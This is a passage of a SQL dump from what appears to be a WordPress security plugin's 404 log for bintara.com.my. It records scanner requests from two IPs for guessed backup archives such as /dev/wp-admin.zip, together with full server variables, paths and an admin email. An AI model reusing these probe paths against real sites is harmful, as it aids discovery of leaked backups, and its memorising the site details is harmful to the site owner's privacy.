17:59:06',35166016,36976752,'https://bintara.com.my/website/wp-admin.zip',1,0,'68.66.224.26'),(27230,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:82:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-admin.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:3:\"off\";s:7:\"H2_PUSH\";s:3:\"off\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:5:\"335-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:3:\"off\";s:16:\"REDIRECT_H2_PUSH\";s:3:\"off\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"335-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:24:\"REDIRECT_REDIRECT_H2PUSH\";s:3:\"off\";s:25:\"REDIRECT_REDIRECT_H2_PUSH\";s:3:\"off\";s:27:\"REDIRECT_REDIRECT_H2_PUSHED\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:31:\"REDIRECT_REDIRECT_H2_STREAM_TAG\";s:5:\"335-1\";s:23:\"REDIRECT_REDIRECT_HTTP2\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:33:\"REDIRECT_REDIRECT_REDIRECT_H2PUSH\";s:3:\"off\";s:34:\"REDIRECT_REDIRECT_REDIRECT_H2_PUSH\";s:3:\"off\";s:36:\"REDIRECT_REDIRECT_REDIRECT_H2_PUSHED\";s:0:\"\";s:39:\"REDIRECT_REDIRECT_REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:39:\"REDIRECT_REDIRECT_REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:40:\"REDIRECT_REDIRECT_REDIRECT_H2_STREAM_TAG\";s:5:\"335-1\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTP2\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-admin.zip\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-admin.zip\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XY5N6nKlfXTtZ68oOVBX2QAAAAE\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"HEAD\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-admin.zip\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-admin.zip\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XY5N6nKlfXTtZ68oOVBX2QAAAAE\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-admin.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-admin.zip\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5N6nKlfXTtZ68oOVBX2QAAAAE\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"68.66.224.26\";s:11:\"REMOTE_PORT\";s:5:\"56356\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-admin.zip\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-admin.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5N6nKlfXTtZ68oOVBX2QAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569607146.3317\";s:12:\"REQUEST_TIME\";s:10:\"1569607146\";}}','notice','2019-09-27 17:59:08','2019-09-27 17:59:06',35167992,36964856,'https://bintara.com.my/test/wp-admin.zip',1,0,'68.66.224.26'),(27231,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:82:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"/www/wp-admin.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:3:\"off\";s:7:\"H2_PUSH\";s:3:\"off\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:4:\"74-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:3:\"off\";s:16:\"REDIRECT_H2_PUSH\";s:3:\"off\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:4:\"74-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:24:\"REDIRECT_REDIRECT_H2PUSH\";s:3:\"off\";s:25:\"REDIRECT_REDIRECT_H2_PUSH\";s:3:\"off\";s:27:\"REDIRECT_REDIRECT_H2_PUSHED\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:31:\"REDIRECT_REDIRECT_H2_STREAM_TAG\";s:4:\"74-1\";s:23:\"REDIRECT_REDIRECT_HTTP2\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:33:\"REDIRECT_REDIRECT_REDIRECT_H2PUSH\";s:3:\"off\";s:34:\"REDIRECT_REDIRECT_REDIRECT_H2_PUSH\";s:3:\"off\";s:36:\"REDIRECT_REDIRECT_REDIRECT_H2_PUSHED\";s:0:\"\";s:39:\"REDIRECT_REDIRECT_REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:39:\"REDIRECT_REDIRECT_REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:40:\"REDIRECT_REDIRECT_REDIRECT_H2_STREAM_TAG\";s:4:\"74-1\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTP2\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:39:\"https://bintara.com.my/www/wp-admin.zip\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:17:\"/www/wp-admin.zip\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XY5N6XHYVBlg0Ecqvi9U-AAAAAE\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"HEAD\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:39:\"https://bintara.com.my/www/wp-admin.zip\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:17:\"/www/wp-admin.zip\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XY5N6XHYVBlg0Ecqvi9U-AAAAAE\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"https://bintara.com.my/www/wp-admin.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/www/wp-admin.zip\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5N6XHYVBlg0Ecqvi9U-AAAAAE\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"68.66.224.26\";s:11:\"REMOTE_PORT\";s:5:\"56352\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"https://bintara.com.my/www/wp-admin.zip\";s:10:\"SCRIPT_URL\";s:17:\"/www/wp-admin.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5N6XHYVBlg0Ecqvi9U-AAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569607146.6453\";s:12:\"REQUEST_TIME\";s:10:\"1569607146\";}}','notice','2019-09-27 17:59:09','2019-09-27 17:59:07',35168560,36972488,'https://bintara.com.my/www/wp-admin.zip',1,0,'68.66.224.26'),(27232,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:82:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"/dev/wp-admin.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:3:\"off\";s:7:\"H2_PUSH\";s:3:\"off\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:4:\"15-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:3:\"off\";s:16:\"REDIRECT_H2_PUSH\";s:3:\"off\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:4:\"15-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:24:\"REDIRECT_REDIRECT_H2PUSH\";s:3:\"off\";s:25:\"REDIRECT_REDIRECT_H2_PUSH\";s:3:\"off\";s:27:\"REDIRECT_REDIRECT_H2_PUSHED\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:31:\"REDIRECT_REDIRECT_H2_STREAM_TAG\";s:4:\"15-1\";s:23:\"REDIRECT_REDIRECT_HTTP2\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:33:\"REDIRECT_REDIRECT_REDIRECT_H2PUSH\";s:3:\"off\";s:34:\"REDIRECT_REDIRECT_REDIRECT_H2_PUSH\";s:3:\"off\";s:36:\"REDIRECT_REDIRECT_REDIRECT_H2_PUSHED\";s:0:\"\";s:39:\"REDIRECT_REDIRECT_REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:39:\"REDIRECT_REDIRECT_REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:40:\"REDIRECT_REDIRECT_REDIRECT_H2_STREAM_TAG\";s:4:\"15-1\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTP2\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:39:\"https://bintara.com.my/dev/wp-admin.zip\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:17:\"/dev/wp-admin.zip\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XY5N6ds@3O4E744khfb@IQAAAAE\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"HEAD\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:39:\"https://bintara.com.my/dev/wp-admin.zip\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:17:\"/dev/wp-admin.zip\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XY5N6ds@3O4E744khfb@IQAAAAE\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"https://bintara.com.my/dev/wp-admin.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/dev/wp-admin.zip\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5N6ds@3O4E744khfb@IQAAAAE\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"68.66.224.26\";s:11:\"REMOTE_PORT\";s:5:\"56346\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"https://bintara.com.my/dev/wp-admin.zip\";s:10:\"SCRIPT_URL\";s:17:\"/dev/wp-admin.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5N6ds@3O4E744khfb@IQAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569607146.6547\";s:12:\"REQUEST_TIME\";s:10:\"1569607146\";}}','notice','2019-09-27 17:59:09','2019-09-27 17:59:07',35168544,36974112,'https://bintara.com.my/dev/wp-admin.zip',1,0,'68.66.224.26'),(27233,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:82:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/beta/wp-admin.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:3:\"off\";s:7:\"H2_PUSH\";s:3:\"off\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:3:\"7-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:3:\"off\";s:16:\"REDIRECT_H2_PUSH\";s:3:\"off\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:3:\"7-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:24:\"REDIRECT_REDIRECT_H2PUSH\";s:3:\"off\";s:25:\"REDIRECT_REDIRECT_H2_PUSH\";s:3:\"off\";s:27:\"REDIRECT_REDIRECT_H2_PUSHED\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:31:\"REDIRECT_REDIRECT_H2_STREAM_TAG\";s:3:\"7-1\";s:23:\"REDIRECT_REDIRECT_HTTP2\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:33:\"REDIRECT_REDIRECT_REDIRECT_H2PUSH\";s:3:\"off\";s:34:\"REDIRECT_REDIRECT_REDIRECT_H2_PUSH\";s:3:\"off\";s:36:\"REDIRECT_REDIRECT_REDIRECT_H2_PUSHED\";s:0:\"\";s:39:\"REDIRECT_REDIRECT_REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:39:\"REDIRECT_REDIRECT_REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:40:\"REDIRECT_REDIRECT_REDIRECT_H2_STREAM_TAG\";s:3:\"7-1\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTP2\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/beta/wp-admin.zip\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:18:\"/beta/wp-admin.zip\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XY5N6ts@3O4E744khfb@IgAAAAE\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"HEAD\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/beta/wp-admin.zip\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:18:\"/beta/wp-admin.zip\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XY5N6ts@3O4E744khfb@IgAAAAE\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/beta/wp-admin.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/beta/wp-admin.zip\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5N6ts@3O4E744khfb@IgAAAAE\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"68.66.224.26\";s:11:\"REMOTE_PORT\";s:5:\"56384\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/beta/wp-admin.zip\";s:10:\"SCRIPT_URL\";s:18:\"/beta/wp-admin.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5N6ts@3O4E744khfb@IgAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569607146.6876\";s:12:\"REQUEST_TIME\";s:10:\"1569607146\";}}','notice','2019-09-27 17:59:09','2019-09-27 17:59:07',35164792,36962256,'https://bintara.com.my/beta/wp-admin.zip',1,0,'68.66.224.26'),(27234,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"/news/bintara.com.my.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"http://bintara.com.my/news/bintara.com.my.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:24:\"/news/bintara.com.my.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5OKnHYVBlg0Ecqvi9VBgAAAE0\";s:12:\"REDIRECT_URL\";s:24:\"/news/bintara.com.my.zip\";s:11:\"REMOTE_ADDR\";s:15:\"190.107.177.250\";s:11:\"REMOTE_PORT\";s:5:\"55586\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:45:\"http://bintara.com.my/news/bintara.com.my.zip\";s:10:\"SCRIPT_URL\";s:24:\"/news/bintara.com.my.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5OKnHYVBlg0Ecqvi9VBgAAAE0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569607213.4352\";s:12:\"REQUEST_TIME\";s:10:\"1569607213\";}}','notice','2019-09-27 18:00:16','2019-09-27 